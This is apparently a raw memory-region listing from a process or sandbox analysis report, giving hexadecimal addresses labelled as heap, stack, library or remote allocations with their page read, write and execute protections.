trusted library allocation
page read and write
1CAA2D40000
heap
page read and write
1CA88B08000
heap
page read and write
3073000
trusted library allocation
page read and write
9C839F9000
stack
page read and write
1CBBF86B000
heap
page read and write
1FD30FCF000
heap
page read and write
308F000
trusted library allocation
page read and write
1CBBF83F000
heap
page read and write
15F0000
heap
page read and write
169B524D000
trusted library allocation
page read and write
161B4D11000
heap
page read and write
939000
stack
page read and write
19EFFDCE000
heap
page read and write
24FB62A0000
heap
page read and write
1CBBF884000
heap
page read and write
12F9000
stack
page read and write
1CBBF83F000
heap
page read and write
12D34EC2000
heap
page read and write
15B8000
heap
page read and write
12D3503F000
trusted library allocation
page read and write
19EE8662000
trusted library allocation
page read and write
1CBBF85B000
heap
page read and write
19EE8058000
trusted library allocation
page read and write
B2E000
stack
page read and write
1253245E000
heap
page read and write
1CBBF87F000
heap
page read and write
1CBBF86B000
heap
page read and write
3071000
trusted library allocation
page read and write
27802950000
trusted library allocation
page read and write
1CBBF85A000
heap
page read and write
4E9A000
heap
page read and write
125324DA000
heap
page read and write
1CA88A50000
heap
page read and write
1CBBF887000
heap
page read and write
1CBBF83F000
heap
page read and write
1FD30FCF000
heap
page read and write
1CBBF86B000
heap
page read and write
7FFD9B556000
trusted library allocation
page execute and read and write
1CBBF88E000
heap
page read and write
1CBBF866000
heap
page read and write
27800394000
trusted library allocation
page read and write
DDB000
trusted library allocation
page execute and read and write
7FFD9B6B0000
trusted library allocation
page read and write
1050000
heap
page read and write
1CBBD940000
heap
page read and write
1CBBF802000
heap
page read and write
161B3345000
heap
page read and write
18CB000
trusted library allocation
page execute and read and write
9C8484D000
stack
page read and write
24FB5FA4000
heap
page read and write
C4E000
stack
page read and write
1CA8A4A0000
heap
page readonly
BA6000
heap
page read and write
564E000
stack
page read and write
1CA88AC0000
heap
page read and write
3A816F9000
stack
page read and write
125324B6000
heap
page read and write
9E2207D000
stack
page read and write
7FFD9B63A000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
306F000
trusted library allocation
page read and write
1CBBF855000
heap
page read and write
19E80210000
heap
page read and write
50BE000
stack
page read and write
1CBBF85A000
heap
page read and write
9E2308E000
stack
page read and write
32BA000
trusted library allocation
page read and write
3083000
trusted library allocation
page read and write
27818001000
trusted library allocation
page read and write
12D35005000
trusted library allocation
page read and write
9E2310E000
stack
page read and write
1CBBF852000
heap
page read and write
1CAA2E9A000
heap
page read and write
125324EE000
heap
page read and write
1253253F000
heap
page read and write
257B8080000
heap
page read and write
161B3343000
heap
page read and write
121E000
heap
page read and write
2FED000
trusted library allocation
page read and write
161B4D0E000
heap
page read and write
12D35020000
trusted library allocation
page read and write
11BF000
heap
page read and write
12D34ED0000
heap
page read and write
278029BD000
trusted library allocation
page read and write
1CBBF802000
heap
page read and write
C75000
heap
page read and write
161B3370000
heap
page read and write
19EE7865000
heap
page read and write
9F9957E000
stack
page read and write
354C000
heap
page read and write
169B5249000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
5CCD000
unkown
page read and write
2781182C000
trusted library allocation
page read and write
59D0000
trusted library allocation
page execute and read and write
3202000
heap
page read and write
7FFD9B610000
trusted library allocation
page read and write
2B2D000
trusted library allocation
page read and write
5D56000
unkown
page read and write
DF2000
trusted library allocation
page execute and read and write
304F000
trusted library allocation
page read and write
32CC000
trusted library allocation
page read and write
7FFD9B482000
trusted library allocation
page read and write
1CBBDCD5000
heap
page read and write
1FD32BD0000
heap
page read and write
1CBBF87E000
heap
page read and write
4F70000
heap
page read and write
1CAA2E9F000
heap
page read and write
73B000
stack
page read and write
7FFD9B52C000
trusted library allocation
page execute and read and write
1333000
trusted library allocation
page execute and read and write
12532542000
heap
page read and write
12D35080000
trusted library allocation
page execute
1CBBF86E000
heap
page read and write
19EFFDBA000
heap
page read and write
1CAA2CC4000
heap
page read and write
3067000
trusted library allocation
page read and write
3019000
trusted library allocation
page read and write
11CB000
heap
page read and write
1CBBF852000
heap
page read and write
306D000
trusted library allocation
page read and write
1CAA2C16000
heap
page execute and read and write
3005000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
E79000
heap
page read and write
9C83B7E000
stack
page read and write
C70000
heap
page read and write
1FD32C74000
heap
page read and write
1CBBF83F000
heap
page read and write
3011000
trusted library allocation
page read and write
161B33CA000
heap
page read and write
1CBBF852000
heap
page read and write
7FFD9B680000
trusted library allocation
page read and write
2FC9000
trusted library allocation
page read and write
1CAA2CB6000
heap
page read and write
11C4000
heap
page read and write
2FE3000
trusted library allocation
page read and write
12D342A7000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF854000
heap
page read and write
125326AD000
heap
page read and write
1CBBF877000
heap
page read and write
55BE000
stack
page read and write
161B4D09000
heap
page read and write
125324F7000
heap
page read and write
83B000
stack
page read and write
2FBF000
trusted library allocation
page read and write
9E22539000
stack
page read and write
9E223B7000
stack
page read and write
119E000
stack
page read and write
585E000
stack
page read and write
1CBBF884000
heap
page read and write
9F99978000
stack
page read and write
2F91000
trusted library allocation
page read and write
169B55EB000
heap
page read and write
FAB000
stack
page read and write
2F9F000
trusted library allocation
page read and write
125324A4000
heap
page read and write
19EE7CF5000
trusted library allocation
page read and write
169B55E9000
heap
page read and write
303F000
trusted library allocation
page read and write
142E000
stack
page read and write
402000
remote allocation
page execute and read and write
24FB5FA8000
heap
page read and write
169B56EF000
trusted library allocation
page read and write
278029C4000
trusted library allocation
page read and write
19E8025B000
heap
page read and write
19EE7CFB000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
1CBBF83F000
heap
page read and write
12533F44000
heap
page read and write
599E000
stack
page read and write
27819401000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
1CBBF871000
heap
page read and write
1CBBF86D000
heap
page read and write
3FED000
trusted library allocation
page read and write
1CBBF878000
heap
page read and write
125324EE000
heap
page read and write
1CBBF85A000
heap
page read and write
1CA88A80000
heap
page read and write
1CA8AC62000
trusted library allocation
page read and write
12533E50000
heap
page read and write
161B3327000
heap
page read and write
1CBBF854000
heap
page read and write
1CBBF876000
heap
page read and write
12D34590000
heap
page readonly
12D34ED4000
heap
page read and write
125323F0000
heap
page read and write
1CBBF83F000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1CBBF878000
heap
page read and write
1CBBF873000
heap
page read and write
2FF0000
direct allocation
page read and write
7FFD9B474000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
1CAA2C57000
heap
page read and write
1430000
heap
page read and write
326B000
trusted library allocation
page read and write
1CA8AC99000
trusted library allocation
page read and write
1CBBF87D000
heap
page read and write
19EFFCE0000
heap
page execute and read and write
27800001000
trusted library allocation
page read and write
27810878000
trusted library allocation
page read and write
1CBBDB10000
heap
page read and write
54EC000
heap
page read and write
1CA8A520000
trusted library allocation
page read and write
302F000
trusted library allocation
page read and write
161B339A000
heap
page read and write
1CBBF860000
heap
page read and write
1572000
trusted library allocation
page execute and read and write
1CBBF854000
heap
page read and write
161B3391000
heap
page read and write
1CA9ABB1000
trusted library allocation
page read and write
1C480FE000
stack
page read and write
1CBBF803000
heap
page read and write
3F8D000
trusted library allocation
page read and write
E5D000
heap
page read and write
169B608F000
heap
page read and write
19E80220000
heap
page read and write
5760000
heap
page read and write
9C84A8D000
stack
page read and write
1FD311B0000
heap
page read and write
190E000
stack
page read and write
161B3343000
heap
page read and write
8D5B0F9000
stack
page read and write
12E0000
heap
page read and write
1CA8B678000
trusted library allocation
page read and write
12533F40000
heap
page read and write
1CBBF873000
heap
page read and write
5BEE000
stack
page read and write
8D5B1FF000
stack
page read and write
2FC5000
trusted library allocation
page read and write
24FB6150000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
27804506000
trusted library allocation
page read and write
330D000
trusted library allocation
page read and write
1FD32C70000
heap
page read and write
1CAA2EC4000
heap
page read and write
161B339A000
heap
page read and write
169B55E9000
heap
page read and write
326D000
trusted library allocation
page read and write
3039000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
3075000
trusted library allocation
page read and write
24FB5F00000
heap
page read and write
7FFD9B640000
trusted library allocation
page execute and read and write
1CBBF866000
heap
page read and write
2FE0000
heap
page read and write
257B7DA7000
heap
page read and write
1CBBF86B000
heap
page read and write
1CAA2C10000
heap
page execute and read and write
12D34ED4000
heap
page read and write
27B0000
heap
page execute and read and write
7FFD9B7C0000
trusted library allocation
page read and write
9E222BE000
stack
page read and write
D67000
trusted library allocation
page execute and read and write
32D4000
trusted library allocation
page read and write
1CA8A470000
trusted library allocation
page read and write
5C20000
unkown
page read and write
2FB7000
trusted library allocation
page read and write
278044DB000
trusted library allocation
page read and write
32EB000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
12D35009000
trusted library allocation
page read and write
4D30000
trusted library section
page read and write
24FB61A4000
heap
page read and write
161A000
heap
page read and write
1CBBF866000
heap
page read and write
9C84A0A000
stack
page read and write
1567000
trusted library allocation
page execute and read and write
19EE5CCE000
heap
page read and write
7FFD9B483000
trusted library allocation
page execute and read and write
2F8F000
trusted library allocation
page read and write
1CBBF802000
heap
page read and write
7FFD9B48B000
trusted library allocation
page read and write
125326A0000
heap
page read and write
2FD7000
trusted library allocation
page read and write
1310000
heap
page read and write
3063000
trusted library allocation
page read and write
1CBBF7F3000
heap
page read and write
2C03000
trusted library allocation
page read and write
1CBBF873000
heap
page read and write
12D34EB0000
heap
page read and write
1CBBF854000
heap
page read and write
9F995FB000
stack
page read and write
161B32A0000
heap
page read and write
354C000
heap
page read and write
9F9A90C000
stack
page read and write
7FFD9B530000
trusted library allocation
page read and write
390D000
trusted library allocation
page read and write
2F80000
heap
page read and write
278029E4000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
4E6E000
stack
page read and write
1CBBF800000
heap
page read and write
169B55DA000
heap
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
1CBBDCDE000
heap
page read and write
5BA0000
unkown
page read and write
8D5B44E000
stack
page read and write
19EE5EE5000
heap
page read and write
1CBBF873000
heap
page read and write
9E224BE000
stack
page read and write
12D342AE000
heap
page read and write
19EE7D49000
trusted library allocation
page read and write
1CA8AB41000
trusted library allocation
page read and write
9E2318D000
stack
page read and write
11A8000
heap
page read and write
E7C000
heap
page read and write
24FB62A6000
heap
page read and write
4D083FE000
stack
page read and write
B60000
heap
page read and write
1CAA2E63000
heap
page read and write
1CBBDCD9000
heap
page read and write
1CBBF87C000
heap
page read and write
1130000
heap
page read and write
19EE8657000
trusted library allocation
page read and write
1CBBF884000
heap
page read and write
D80000
trusted library allocation
page read and write
1FD31160000
heap
page read and write
581F000
stack
page read and write
19EE7690000
trusted library allocation
page read and write
57F0000
direct allocation
page execute and read and write
19E8022E000
heap
page read and write
307D000
trusted library allocation
page read and write
1CBBF878000
heap
page read and write
3484000
heap
page read and write
5450000
direct allocation
page execute and read and write
4D51000
trusted library allocation
page read and write
125324FE000
heap
page read and write
27801798000
trusted library allocation
page read and write
9F991EE000
stack
page read and write
1FD32C7D000
heap
page read and write
19EE8638000
trusted library allocation
page read and write
1CA8B5B0000
trusted library allocation
page read and write
4F3E000
stack
page read and write
30B7000
trusted library allocation
page read and write
7FFD9B710000
trusted library allocation
page read and write
1CA8ABC9000
trusted library allocation
page read and write
19EE5EE0000
heap
page read and write
19EE76A0000
heap
page readonly
574E000
stack
page read and write
3051000
trusted library allocation
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
134D000
trusted library allocation
page execute and read and write
7FFD9B6C0000
trusted library allocation
page read and write
257B7F90000
heap
page read and write
DEA000
trusted library allocation
page execute and read and write
12D34EB4000
heap
page read and write
543E000
trusted library allocation
page read and write
19EE7BB1000
trusted library allocation
page read and write
1CA88A75000
heap
page read and write
1CBBF849000
heap
page read and write
2FC3000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
12532519000
heap
page read and write
1CBBF86B000
heap
page read and write
157A000
trusted library allocation
page execute and read and write
9E21EFF000
stack
page read and write
7FFD9B536000
trusted library allocation
page read and write
7FFD9B631000
trusted library allocation
page read and write
12D34290000
heap
page read and write
27802983000
trusted library allocation
page read and write
15E6000
heap
page read and write
278044DD000
trusted library allocation
page read and write
2FB1000
trusted library allocation
page read and write
D90000
trusted library allocation
page read and write
302D000
trusted library allocation
page read and write
7FFD9B740000
trusted library allocation
page read and write
9F9967F000
stack
page read and write
328D000
trusted library allocation
page read and write
12532660000
trusted library allocation
page read and write
7FFD9B490000
trusted library allocation
page read and write
11D8000
heap
page read and write
9F99AFF000
stack
page read and write
1CBBF863000
heap
page read and write
3278000
trusted library allocation
page read and write
1CBBF85A000
heap
page read and write
1CBBF86B000
heap
page read and write
9C83BFE000
stack
page read and write
1CBBD947000
heap
page read and write
9C838FE000
stack
page read and write
1CA8AB9E000
trusted library allocation
page read and write
12D34294000
heap
page read and write
1339000
stack
page read and write
799000
stack
page read and write
1CBBF887000
heap
page read and write
1CA8AC4E000
trusted library allocation
page read and write
169B55D0000
heap
page read and write
161B336B000
heap
page read and write
301D000
trusted library allocation
page read and write
3505000
heap
page read and write
27804509000
trusted library allocation
page read and write
27800D98000
trusted library allocation
page read and write
2EFB000
stack
page read and write
19EFFE32000
heap
page read and write
2DA0000
heap
page read and write
1CBBF800000
heap
page read and write
9E223BE000
stack
page read and write
12D34ECA000
heap
page read and write
19EE86D1000
trusted library allocation
page read and write
1CBBF88E000
heap
page read and write
1CBBDCD9000
heap
page read and write
161B4CF0000
heap
page read and write
1CBBDA33000
heap
page read and write
1CBBF86B000
heap
page read and write
1CA8AAE0000
heap
page execute and read and write
1CBBF873000
heap
page read and write
3077000
trusted library allocation
page read and write
125324EA000
heap
page read and write
125326A6000
heap
page read and write
D3E000
stack
page read and write
D50000
trusted library allocation
page read and write
DF0000
heap
page read and write
1CA8B5CB000
trusted library allocation
page read and write
3027000
trusted library allocation
page read and write
289E000
stack
page read and write
9F991A3000
stack
page read and write
161B3500000
trusted library allocation
page read and write
27802966000
trusted library allocation
page read and write
1FD30F9F000
heap
page read and write
E12000
trusted library allocation
page execute and read and write
1CBBF877000
heap
page read and write
9F99876000
stack
page read and write
9F999F8000
stack
page read and write
E18000
heap
page read and write
24FB5FAE000
heap
page read and write
1CBBF875000
heap
page read and write
12532491000
heap
page read and write
AF9000
stack
page read and write
169B55DA000
heap
page read and write
9E226BB000
stack
page read and write
1CA8B050000
trusted library allocation
page read and write
D5D000
trusted library allocation
page execute and read and write
9C0000
heap
page read and write
169B63C0000
heap
page read and write
406D000
trusted library allocation
page read and write
2FCD000
trusted library allocation
page read and write
12D345A4000
heap
page read and write
303B000
trusted library allocation
page read and write
3D31000
trusted library allocation
page read and write
19EE7C0E000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
161B336B000
heap
page read and write
19EFFDC1000
heap
page read and write
19EE5CEE000
heap
page read and write
517F000
stack
page read and write
7FFD9B73F000
trusted library allocation
page read and write
1CBBDCDC000
heap
page read and write
1CBBF860000
heap
page read and write
3031000
trusted library allocation
page read and write
4D07EFE000
stack
page read and write
161B3307000
heap
page read and write
1CA8B5DE000
trusted library allocation
page read and write
2FF1000
trusted library allocation
page read and write
2FA5000
trusted library allocation
page read and write
1CBBF87D000
heap
page read and write
19EE867E000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
1FD32C7E000
heap
page read and write
7FFD9B720000
trusted library allocation
page read and write
1CA88A40000
heap
page read and write
3059000
trusted library allocation
page read and write
27802994000
trusted library allocation
page read and write
9F9A57E000
stack
page read and write
3512000
heap
page read and write
1CBBF86B000
heap
page read and write
2F8B000
trusted library allocation
page read and write
57C2000
unkown
page read and write
1CA8ACA1000
trusted library allocation
page read and write
1050000
heap
page read and write
18C7000
trusted library allocation
page execute and read and write
125324E9000
heap
page read and write
3035000
trusted library allocation
page read and write
7FFD9B47D000
trusted library allocation
page execute and read and write
19EE5CDA000
heap
page read and write
9C83D7B000
stack
page read and write
7FFD9B622000
trusted library allocation
page read and write
D54000
trusted library allocation
page read and write
2E50000
trusted library allocation
page execute and read and write
1CBBF881000
heap
page read and write
14E0000
heap
page read and write
1FD30FB8000
heap
page read and write
7FFD9B5A0000
trusted library allocation
page execute and read and write
1CA88B48000
heap
page read and write
7FFD9B6A0000
trusted library allocation
page read and write
319E000
stack
page read and write
2FFD000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
7FFD9B662000
trusted library allocation
page read and write
1CBBF878000
heap
page read and write
1080000
heap
page execute and read and write
7FFD9B680000
trusted library allocation
page read and write
1CBBF875000
heap
page read and write
5AFF000
stack
page read and write
18B2000
trusted library allocation
page execute and read and write
1CBBF849000
heap
page read and write
1CBBF85A000
heap
page read and write
19EE7BC1000
trusted library allocation
page read and write
1FD311CE000
heap
page read and write
12DE000
stack
page read and write
1CBBF84A000
heap
page read and write
7FFD9B49B000
trusted library allocation
page read and write
278117CF000
trusted library allocation
page read and write
D6F000
stack
page read and write
1CBBF860000
heap
page read and write
19EE5C98000
heap
page read and write
169B55EA000
heap
page read and write
4D081FD000
stack
page read and write
1CBBF803000
heap
page read and write
9F9A70E000
stack
page read and write
1CBBDCDD000
heap
page read and write
305D000
trusted library allocation
page read and write
7FFD9B710000
trusted library allocation
page read and write
1CBBF887000
heap
page read and write
300B000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
7DF49C9D0000
trusted library allocation
page execute and read and write
64620FE000
stack
page read and write
13B0000
heap
page read and write
9F9977D000
stack
page read and write
7FFD9B660000
trusted library allocation
page execute and read and write
1344000
trusted library allocation
page read and write
125324FB000
heap
page read and write
9E21F7F000
stack
page read and write
1CBBF881000
heap
page read and write
32D7000
trusted library allocation
page read and write
1390000
heap
page read and write
1CBBF7E3000
heap
page read and write
2FE1000
trusted library allocation
page read and write
2FAB000
trusted library allocation
page read and write
5E01000
unkown
page read and write
1CBBF866000
heap
page read and write
1CAA2CDE000
heap
page read and write
3001000
trusted library allocation
page read and write
2FE7000
trusted library allocation
page read and write
1CBBF849000
heap
page read and write
1802000
trusted library allocation
page execute and read and write
125324EE000
heap
page read and write
5441000
trusted library allocation
page read and write
1CBBF887000
heap
page read and write
9E2217D000
stack
page read and write
1FD30F99000
heap
page read and write
9C836FF000
stack
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
4FBE000
stack
page read and write
DD7000
trusted library allocation
page execute and read and write
1CBBF864000
heap
page read and write
7FFD9B520000
trusted library allocation
page read and write
1CA8AFE9000
trusted library allocation
page read and write
161B4E7D000
heap
page read and write
5C01000
heap
page read and write
2FEF000
trusted library allocation
page read and write
12D35CE0000
heap
page read and write
576E000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
1CA88B5F000
heap
page read and write
32DB000
trusted library allocation
page read and write
40BA000
trusted library allocation
page read and write
3029000
trusted library allocation
page read and write
3069000
trusted library allocation
page read and write
161B336B000
heap
page read and write
169B56E5000
trusted library allocation
page read and write
26AE000
stack
page read and write
4F80000
heap
page read and write
DE2000
trusted library allocation
page execute and read and write
161B33C8000
heap
page read and write
32ED000
trusted library allocation
page read and write
1C4864C000
stack
page read and write
9F9A78B000
stack
page read and write
1CBBF87D000
heap
page read and write
1CBBF880000
heap
page read and write
12D345A0000
heap
page read and write
1CBBF886000
heap
page read and write
309A000
trusted library allocation
page read and write
257B7DAE000
heap
page read and write
169B56D5000
trusted library allocation
page read and write
12D35028000
trusted library allocation
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
304B000
trusted library allocation
page read and write
161B4DF0000
heap
page read and write
44E1000
trusted library allocation
page read and write
1C4899E000
stack
page read and write
125324B2000
heap
page read and write
161B3370000
heap
page read and write
1CBBF849000
heap
page read and write
169B6097000
heap
page read and write
1CA8AC51000
trusted library allocation
page read and write
4D6E000
stack
page read and write
125324EE000
heap
page read and write
1CBBF86F000
heap
page read and write
9E2243E000
stack
page read and write
1CBBF85A000
heap
page read and write
15A0000
heap
page read and write
3009000
trusted library allocation
page read and write
1CBBF85A000
heap
page read and write
1CBBF860000
heap
page read and write
9F9947E000
stack
page read and write
257B7DA9000
heap
page read and write
1CA8AB67000
trusted library allocation
page read and write
19EE8659000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
1CBBF87D000
heap
page read and write
4DF0000
heap
page read and write
12532400000
heap
page read and write
19EE7D4B000
trusted library allocation
page read and write
19E80200000
heap
page read and write
57EF000
stack
page read and write
12532450000
heap
page read and write
1CBBDCDA000
heap
page read and write
161B3347000
heap
page read and write
1CBBF879000
heap
page read and write
64623FF000
stack
page read and write
9F99B7B000
stack
page read and write
9C83A7C000
stack
page read and write
1CBBF85A000
heap
page read and write
12532544000
heap
page read and write
2FB9000
trusted library allocation
page read and write
15CD000
heap
page read and write
1CBBF868000
heap
page read and write
1155000
heap
page read and write
27802198000
trusted library allocation
page read and write
125324E9000
heap
page read and write
1CBBF86B000
heap
page read and write
12532477000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1CA88B44000
heap
page read and write
12532650000
trusted library allocation
page read and write
1CBBF88B000
heap
page read and write
1CBBF87D000
heap
page read and write
7FFD9B730000
trusted library allocation
page read and write
1CA8B67E000
trusted library allocation
page read and write
5620000
heap
page read and write
9F9A64D000
stack
page read and write
32E1000
trusted library allocation
page read and write
1CBBF867000
heap
page read and write
2FDB000
trusted library allocation
page read and write
1CBBF87A000
heap
page read and write
27800223000
trusted library allocation
page read and write
B30000
heap
page read and write
104E000
stack
page read and write
169B55D1000
heap
page read and write
34E1000
trusted library allocation
page read and write
3045000
trusted library allocation
page read and write
2781006D000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
1FD32BF4000
heap
page read and write
1560000
trusted library allocation
page read and write
161B339A000
heap
page read and write
19EFFD96000
heap
page execute and read and write
1CBBF87E000
heap
page read and write
1FD30FB2000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
7FFD9B53C000
trusted library allocation
page execute and read and write
1CBBF860000
heap
page read and write
1CBBF878000
heap
page read and write
2FC1000
trusted library allocation
page read and write
3282000
trusted library allocation
page read and write
1CBBF867000
heap
page read and write
2D90000
heap
page read and write
1CBBF88E000
heap
page read and write
161B32B0000
heap
page read and write
1FD311CE000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF800000
heap
page read and write
125324B2000
heap
page read and write
7FFD9B740000
trusted library allocation
page read and write
257B7DAE000
heap
page read and write
DA2000
trusted library allocation
page execute and read and write
2821000
trusted library allocation
page read and write
1CBBF83F000
heap
page read and write
4E00000
heap
page read and write
12D34ED0000
heap
page read and write
308B000
trusted library allocation
page read and write
125324E9000
heap
page read and write
1CBBF878000
heap
page read and write
278117D8000
trusted library allocation
page read and write
1663000
heap
page read and write
169B56D8000
trusted library allocation
page read and write
AF6000
stack
page read and write
1CBBF85A000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
1CBBF83F000
heap
page read and write
1FD32C7E000
heap
page read and write
32A7000
trusted library allocation
page read and write
169B55E9000
heap
page read and write
161B3370000
heap
page read and write
4DCE000
stack
page read and write
278044DF000
trusted library allocation
page read and write
12533F30000
heap
page read and write
1CBBF869000
heap
page read and write
5730000
unkown
page read and write
CEB000
stack
page read and write
1450000
heap
page read and write
51C000
remote allocation
page execute and read and write
27800398000
trusted library allocation
page read and write
12D342B1000
heap
page read and write
7FFD9B62A000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
1CBBF860000
heap
page read and write
7FFD9B540000
trusted library allocation
page execute and read and write
400000
remote allocation
page execute and read and write
53AE000
stack
page read and write
1CA9AB50000
trusted library allocation
page read and write
2F99000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
1830000
trusted library allocation
page read and write
5A80000
unkown
page read and write
1CBBF86B000
heap
page read and write
561E000
stack
page read and write
9E2263B000
stack
page read and write
3055000
trusted library allocation
page read and write
1CAA2E66000
heap
page read and write
5410000
trusted library allocation
page execute and read and write
7FFD9B7D0000
trusted library allocation
page read and write
A94000
heap
page read and write
1CBBF83F000
heap
page read and write
2F3C000
stack
page read and write
2F9B000
trusted library allocation
page read and write
2D31000
trusted library allocation
page read and write
5A00000
unkown
page read and write
169B55EB000
heap
page read and write
161B33D7000
heap
page read and write
1CBBF881000
heap
page read and write
1CBBF83F000
heap
page read and write
9E220FE000
stack
page read and write
1CBBF866000
heap
page read and write
278110E9000
trusted library allocation
page read and write
12D34EC2000
heap
page read and write
165C000
heap
page read and write
15EF000
stack
page read and write
19EE7CB5000
trusted library allocation
page read and write
2F70000
unkown
page execute and read and write
9E2328B000
stack
page read and write
12D346B0000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
7FFD9B700000
trusted library allocation
page read and write
278044A3000
trusted library allocation
page read and write
9C8488E000
stack
page read and write
1CA8B63A000
trusted library allocation
page read and write
161B33C5000
heap
page read and write
300F000
trusted library allocation
page read and write
1CA8A490000
trusted library allocation
page read and write
AEC000
heap
page read and write
4D07CF3000
stack
page read and write
278102F4000
trusted library allocation
page read and write
1CBBF877000
heap
page read and write
1CBBF7E5000
heap
page read and write
1CBBF7E0000
heap
page read and write
57ED000
direct allocation
page execute and read and write
1CBBF841000
heap
page read and write
2FBD000
trusted library allocation
page read and write
1CBBF84A000
heap
page read and write
3484000
heap
page read and write
1CBBF7F8000
heap
page read and write
18AF000
stack
page read and write
4D085FE000
stack
page read and write
1CBBF855000
heap
page read and write
1C47DB3000
stack
page read and write
12532458000
heap
page read and write
19E80259000
heap
page read and write
1CBBF883000
heap
page read and write
7FFD9B620000
trusted library allocation
page read and write
9C83CFB000
stack
page read and write
7FFD9B472000
trusted library allocation
page read and write
3213000
heap
page read and write
1CA88B8C000
heap
page read and write
1CBBF887000
heap
page read and write
1CBBF884000
heap
page read and write
D9A000
trusted library allocation
page execute and read and write
4D087FB000
stack
page read and write
1CA8B640000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
64624FE000
stack
page read and write
1CAA2C55000
heap
page read and write
56BE000
stack
page read and write
49BE000
stack
page read and write
100F000
stack
page read and write
1336000
stack
page read and write
169B6088000
heap
page read and write
1CBBF84A000
heap
page read and write
2810000
heap
page read and write
1CBBF862000
heap
page read and write
161B3334000
heap
page read and write
1CBBF88E000
heap
page read and write
7FFD9B690000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
ECE000
stack
page read and write
3079000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
1253253F000
heap
page read and write
2FD3000
trusted library allocation
page read and write
1CA8AC54000
trusted library allocation
page read and write
257B82E0000
heap
page read and write
DA0000
trusted library allocation
page execute and read and write
2781257C000
trusted library allocation
page read and write
1CBBF878000
heap
page read and write
1CBBF87D000
heap
page read and write
9F99BFB000
stack
page read and write
E47000
heap
page read and write
19EE7C35000
trusted library allocation
page read and write
301B000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF85A000
heap
page read and write
1590000
trusted library allocation
page read and write
7FFD9B690000
trusted library allocation
page read and write
3003000
trusted library allocation
page read and write
152E000
stack
page read and write
278102FE000
trusted library allocation
page read and write
1FD312E6000
heap
page read and write
3065000
trusted library allocation
page read and write
1577000
trusted library allocation
page execute and read and write
169B55E9000
heap
page read and write
1CBBF852000
heap
page read and write
DDE000
stack
page read and write
7FFD9B630000
trusted library allocation
page execute and read and write
1CBBDCD9000
heap
page read and write
1FD32BF0000
heap
page read and write
1CBBF879000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF888000
heap
page read and write
19EE8666000
trusted library allocation
page read and write
9F9A5CE000
stack
page read and write
2F81000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
1860000
heap
page read and write
D6A000
trusted library allocation
page execute and read and write
257B7DA7000
heap
page read and write
12D3500D000
trusted library allocation
page read and write
A2E000
stack
page read and write
12D34EB8000
heap
page read and write
1A80000
heap
page execute and read and write
4D00000
heap
page read and write
1CBBF852000
heap
page read and write
19EF7C20000
trusted library allocation
page read and write
161B336B000
heap
page read and write
3007000
trusted library allocation
page read and write
1C4874E000
stack
page read and write
169B608F000
heap
page read and write
1CBBF87B000
heap
page read and write
1CA8B5D6000
trusted library allocation
page read and write
19EFFD90000
heap
page execute and read and write
2FA3000
trusted library allocation
page read and write
1CA8B5F4000
trusted library allocation
page read and write
9C8367F000
stack
page read and write
161B34B0000
heap
page read and write
1CBBF87D000
heap
page read and write
1253253F000
heap
page read and write
19EFFDE3000
heap
page read and write
A60000
trusted library allocation
page read and write
19EFFE82000
heap
page read and write
3041000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
3081000
trusted library allocation
page read and write
3025000
trusted library allocation
page read and write
2780299C000
trusted library allocation
page read and write
7C0000
heap
page read and write
1CBBF879000
heap
page read and write
3023000
trusted library allocation
page read and write
2FEB000
trusted library allocation
page read and write
1CBBF802000
heap
page read and write
64627FE000
stack
page read and write
1C481FF000
stack
page read and write
3A817FF000
stack
page read and write
4D086FE000
stack
page read and write
307B000
trusted library allocation
page read and write
1A50000
heap
page read and write
125324B6000
heap
page read and write
12D35025000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
346A000
heap
page read and write
307F000
trusted library allocation
page read and write
19E80269000
heap
page read and write
24FB5F20000
heap
page read and write
69B000
stack
page read and write
1CBBF880000
heap
page read and write
12532420000
heap
page read and write
257B81B0000
heap
page read and write
12532519000
heap
page read and write
5812000
heap
page read and write
2F89000
trusted library allocation
page read and write
169B5270000
heap
page read and write
1CBBF85B000
heap
page read and write
9E22337000
stack
page read and write
1CBBF87B000
heap
page read and write
19EE5D15000
heap
page read and write
1CBBF8E0000
heap
page read and write
1CBBF860000
heap
page read and write
2FD9000
trusted library allocation
page read and write
161B32EF000
heap
page read and write
5BF0000
unkown
page read and write
1CBBF860000
heap
page read and write
17EF000
stack
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
161E000
heap
page read and write
